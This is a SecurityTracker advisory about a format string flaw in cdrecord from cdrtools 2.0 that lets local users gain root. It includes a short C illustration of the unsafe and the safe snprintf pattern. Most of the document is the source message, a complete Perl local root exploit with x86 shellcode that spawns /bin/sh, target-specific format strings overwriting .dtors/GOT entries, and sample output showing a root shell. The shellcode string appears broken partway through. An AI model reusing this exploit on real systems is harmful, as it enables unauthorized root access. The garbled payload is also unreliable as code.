Category:   Application (Multimedia)  >   cdrtools Vendors:   Schilling, J.
(Exploit is Available) Re: 'cdrtools' Format String Flaw Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1006752
SecurityTracker URL:  http://securitytracker.com/id/1006752
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 14 2003
Impact:   Execution of arbitrary code via local system, Root access via local system, User access via local system
Exploit Included:  Yes  
Version(s): 2.0
Description:   A format string vulnerability was reported in 'cdrecord' in the 'cdrtools' package. A local user can gain elevated privileges on the system, including root privileges on some distributions.

It is reported that libscg/scsiopen.c contains a format string flaw at line 273, where js_snprintf() is called without a proper format string. A local user can set the 'dev' argument to a specially crafted value to trigger the flaw and potentially execute arbitrary code. The privileges that the code will run with depend on the package distribution. According to the report, the package is installed set-user-id (setuid) root on some distributions.
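The defect class described above, as an added illustration that is not the cdrtools source: a caller-controlled device string used directly as the format argument, beside the hardened call that passes it through a fixed "%s" format. Plain snprintf() stands in for js_snprintf(), and the buffer size and function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size for the illustration; not taken from scsiopen.c. */
#define ERRBUF_LEN 128

/* Vulnerable pattern: the untrusted device name is itself the format
 * argument, so any '%' directives it carries are interpreted.
 * The compiler diagnoses exactly this with -Wformat-security; the
 * pragma only keeps the demonstration compiling. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
int format_dev_unsafe(char *out, size_t outlen, const char *dev)
{
    return snprintf(out, outlen, dev);
}
#pragma GCC diagnostic pop

/* Hardened pattern: a literal format, and the untrusted string is only
 * ever consumed as a %s argument, never parsed for directives. */
int format_dev_safe(char *out, size_t outlen, const char *dev)
{
    return snprintf(out, outlen, "%s", dev);
}

/* Returns 1 when the formatted message is a verbatim copy of dev, 0 when
 * the device string was reinterpreted on the way through. */
int preserves_input(int (*fmt)(char *, size_t, const char *), const char *dev)
{
    char buf[ERRBUF_LEN];
    fmt(buf, sizeof buf, dev);
    return strcmp(buf, dev) == 0;
}

int main(void)
{
    /* Constructed input. "%%" is the one directive whose result is well
     * defined without a matching argument, so it exposes the
     * reinterpretation deterministically: the unsafe path collapses it
     * to a single '%' while the safe path leaves the string untouched. */
    const char *dev = "0,0,0 100%%";
    printf("unsafe path preserves input: %d\n", preserves_input(format_dev_unsafe, dev));
    printf("safe   path preserves input: %d\n", preserves_input(format_dev_safe, dev));
    return 0;
}
```

Building the unsafe function without the pragma and with -Wformat-security shows the warning a reviewer would rely on to catch this pattern in a code base.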

Some exploit code is available in the Source Message.

Impact:   A local user can execute arbitrary code with elevated privileges on the system. The specific privileges depend on the settings of the particular distribution. Some distributions of the application permit the local user to obtain root privileges.
Solution:   The vendor has released a fixed alpha version (2.01a14), available at:

ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz

Vendor URL:  www.fokus.fhg.de/research/cc/glone/employees/joerg.schilling/private/cdrecord.html (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry is a follow-up to the message listed below.
May 14 2003 'cdrtools' Format String Flaw Lets Local Users Gain Elevated Privileges



 Source Message Contents

Subject:  Cdrecord local root exploit.


Priv8security.com 

Hi, here it is: a local root exploit for the cdrecord format string bug.
Cdrecord comes suid root by default on the Mandrake distro and it can be
executed by anybody.

[wsxz@localhost wsxz]$ ls -l /usr/bin/cdrecord
-rwsr-sr-x    1 root     cdwriter   278156 Jan  6 07:2 /usr/bin/cdrecord*

Here goes the code, or get it at
http://releases.priv8security.org/priv8cdr.pl

priv8cdr.pl
--------cut here------------------------------------------------------

#!/usr/bin/perl
###########################################################
#Priv8security.com Cdrecord version 2.0 and < local root exploit.
#
#     Version 1.10 is NOT VULN!!!!
#
#   [wsxz@localhost buffer]$ perl priv8cdr.pl 4
#   Using target number 4
#   Using Mr .dtors 0x808c82c
#   Cdrecord 2.0 (i586-mandrake-linux-gnu) Copyright (C) 1995-2002
#                                 
#                                 
#   scsibus: -1 target: -1 lun: -1
#   Warning: Open by 'devname' is unintentional and not supported.
#   /usr/bin/cdrecord: No such file or directory. Cannot open '.
#   Cannot open SCSI driver.
#   /usr/bin/cdrecord: For possible targets try 'cdrecord -scanbus'.
#   Make sure you are root.
#   /usr/bin/cdrecord: For possible transport specifiers try 'cdrecord dev=help'.
#   sh-2.05b# id
#   uid=0(root) gid=0(root) groups=503(wsxz)
#   sh-2.05b#
#####################################################

                    $shellcode =
                    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0
                    "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0
                    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
                    "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d
89\xd8\x40\xcd\x80\xe8\xdc\xff".
                    "\xff\xff/bin/sh";

                    $cdrecordpath = "/usr/bin/cdrecord";
                    $nop = "\x90"; # x86 NOP
                    $offset = 0; # Default offset to try.


     if (@ARGV == 1 || @ARGV == 2) {
                    $target = $ARGV[0];
                    $offset = $ARGV[1];
                    }else{
                    printf(" Priv8security.com Cdrecord local root exploit!!\n");
                    printf(" usage: $0 target\n");
                    printf(" List of targets:\n");
                    printf("      1 - Linux Mandrake 8.2 Cdrecord 1.11a15\n");
                    printf("      2 - Linux Mandrake 9.0 Cdrecord 1.11a32\n");
                    printf("      3 - Linux Slackware 8.1 Cdrecord 1.11a24 not suid by default!!!\n");
                    printf("      4 - Linux Mandrake 9.1 Cdrecord 2.0\n");
                    exit(1);
                    }

     if ( $target eq "1" ) {
                   $retword = 0x0807af38; #Mr  .dtors ;)
                   $fmtstring = "%.134727238x%x%x%x%x%x%x%x%x%n:";
                    }
     if ( $target eq "2" ) {
                  # $retword = 0x08084578; #.dtors
                   $retword = 0x08084684; #.GOT exit
                   $fmtstring = "%.134769064x%x%x%x%x%x%x%x%x%n:";
                    }
      if ( $target eq "3" ) {
                   $retword = 0x0807f658;
                   $fmtstring =  "%.134745456x%x%x%x%x%x%x%x%x%x%x%n:";
                    }
       if ( $target eq "4" ) {
                   $retword = 0x0808c82c; #.GOT exit
                   $fmtstring = "%.134802669x%x%x%x%x%x%x%x%x%n:";
                    }

                    printf("Using target number %d\n", $target);
                    printf("Using Mr .dtors 0x%x\n",$retword);

                    $new_retword = pack('l', ($retword));
                    $new_retshell = pack('l', ($retshell));
                    $buffer2 = $new_retword;
                    $buffer2 .= $shellcode;
                    $buffer2 .= $fmtstring;

                    exec("$cdrecordpath dev='$buffer2' '$cdrecordpath'");

--------cut here-----------------------------------------------
